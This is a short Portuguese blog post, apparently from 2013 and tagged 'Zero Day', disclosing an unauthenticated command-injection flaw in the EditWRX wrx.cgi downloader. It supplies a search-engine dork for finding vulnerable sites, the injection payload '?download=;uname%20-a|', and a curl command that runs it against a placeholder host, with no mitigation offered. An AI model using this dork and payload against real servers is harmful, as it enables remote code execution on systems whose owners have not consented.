EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar a função.
DORK: +inurl:editwrx/wrx.cgi
Exploit: ?download=;uname%20-a|
Exemplo de uso:
curl "http://sitevull.com/editwrx/wrx.cgi?download=;uname%20-a|"
Mostrando postagens com marcador Zero Day. Mostrar todas as postagens
Mostrando postagens com marcador Zero Day. Mostrar todas as postagens
segunda-feira, 26 de agosto de 2013
Assinar:
Postagens (Atom)